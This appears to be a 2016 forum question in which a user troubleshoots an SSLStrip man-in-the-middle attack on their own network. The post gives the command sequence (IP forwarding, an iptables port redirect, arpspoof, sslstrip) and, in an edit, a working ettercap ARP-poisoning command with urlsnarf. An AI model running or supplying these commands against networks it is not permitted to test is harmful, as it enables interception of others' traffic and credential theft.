SSLStrip with Fedora?

asked 2016-10-02 14:27:53 -0500

fullcowl gravatar image

updated 2016-10-02 16:12:25 -0500

Hey Guys,

i wanted to perfom a MITM Attack on my own network, and followed several tutorials on how to use sslstrip, iptables and arpspoof.

But if I perform the attack, i lose the connection on the target device for almost every website, except google, facebook and some others.. Could it be that i lose connection to websites, which are just HTTP protected and not HTTPS like the bigger websites??

The sslstrip.log file is always empty, but sslstrip is running.. here is the command order i used: echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i wlp3s0 -t -r

sslstrip -l 8080

to look whats going on, i use "tail -f sslstrip.log"

I hope you can tell me what im doing wrong..

EDIT: I used the ettercap method now, and it worked! After configuring the firewall with iptables just use

ettercap -T -q -i <interface> -M ARP:REMOTE /TargetIP//

Then start sslstrip like i mentioned above and use urlsnarf to have an overview over visited websites.

edit retag flag offensive close merge delete